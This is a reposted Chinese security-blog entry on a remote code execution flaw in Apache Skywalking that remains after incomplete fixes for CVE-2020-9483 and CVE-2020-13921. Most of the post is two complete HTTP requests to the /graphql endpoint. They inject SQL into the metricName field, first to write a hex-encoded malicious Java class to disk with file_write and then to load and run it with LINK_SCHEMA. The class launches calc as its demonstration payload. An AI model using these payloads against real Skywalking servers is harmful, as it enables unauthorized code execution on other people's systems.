Skywalking - RCE

  • A+
所属分类:安全文章


Skywalking - RCE


        Skywalking远程代码执行漏洞,为CVE-2020-9483、CVE-2020-13921修复不完善遗留注入点,可被进一步了利用执行代码。

漏洞地址: https://github.com/apache/skywalking/pull/6246/files

https://mp.weixin.qq.com/s/hB-r523_4cM0jZMBOt6Vhw

环境

Skywalking测试环境JDK1.8,恶意类为JDK1.7编译。

Skywalking - RCE


写入恶意类文件

将恶意类编译并转为十六进制数据,为file_write方法的第一个参数赋值,第二个参数为class文件名。

恶意类EvilClass.java 和 转十六进制工具代码ToHexTools.java 均在项目中。

执行 ToHexTools.java 会将 EvilClass.class 文件内容转码为十六进制形式,输出为 file.hex 文件。

Skywalking - RCE


POST /graphql HTTP/1.1Host: 192.168.18.240:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/json;charset=utf-8Content-Length: 2152Origin: http://192.168.18.240:8080Connection: closeReferer: http://192.168.18.240:8080/log
{ "query": "query queryLogs($condition: LogQueryCondition) { logs: queryLogs(condition: $condition) { data: logs { serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content } total } }", "variables": { "condition": { "metricName": "INFORMATION_SCHEMA.USERS union all select file_write('cafebabe0000003100280a000800190a001a001b08001c0a001a001d07001e0a0005001f0700200700210100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301000b4c4576696c436c6173733b0100046d61696e010016285b4c6a6176612f6c616e672f537472696e673b2956010004617267730100135b4c6a6176612f6c616e672f537472696e673b0100083c636c696e69743e010001650100154c6a6176612f696f2f494f457863657074696f6e3b01000a536f7572636546696c6501000e4576696c436c6173732e6a6176610c0009000a0700220c0023002401000463616c630c002500260100136a6176612f696f2f494f457863657074696f6e0c0027000a0100094576696c436c6173730100106a6176612f6c616e672f4f626a6563740100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b01000f7072696e74537461636b547261636500210007000800000000000300010009000a0001000b0000002f00010001000000052ab70001b100000002000c00000006000100000005000d0000000c000100000005000e000f00000009001000110001000b0000002b0000000100000001b100000002000c00000006000100000010000d0000000c00010000000100120013000000080014000a0001000b000000540002000100000012b800021203b6000457a700084b2ab60006b1000100000009000c00050002000c000000160005000000080009000b000c0009000d000a0011000c000d0000000c0001000d000400150016000000010017000000020018','EvilClass.class'))a where 1=? or 1=? or 1=? --", "endpointId":"1", "traceId":"1", "state":"ALL", "stateCode":"1", "paging":{ "pageNum": 1, "pageSize": 1, "needTotal": true } } }}


成功写入EvilClass.class文件。


Skywalking - RCE


加载执行恶意类

LINK_SCHEMA 的第二个参数值为要加载的文件名。

POST /graphql HTTP/1.1Host: 192.168.18.240:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/json;charset=utf-8Content-Length: 791Origin: http://192.168.18.240:8080Connection: closeReferer: http://192.168.18.240:8080/log
{ "query": "query queryLogs($condition: LogQueryCondition) { logs: queryLogs(condition: $condition) { data: logs { serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content } total } }", "variables": { "condition": { "metricName": "INFORMATION_SCHEMA.USERS union all select LINK_SCHEMA('TEST2','EvilClass','jdbc:h2:./test2','sa','sa','PUBLIC'))a where 1=? or 1=? or 1=? --", "endpointId":"1", "traceId":"1", "state":"ALL", "stateCode":"1", "paging":{ "pageNum": 1, "pageSize": 1, "needTotal": true } } }}



Skywalking - RCE


本文始发于微信公众号(Khan安全团队):Skywalking - RCE

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: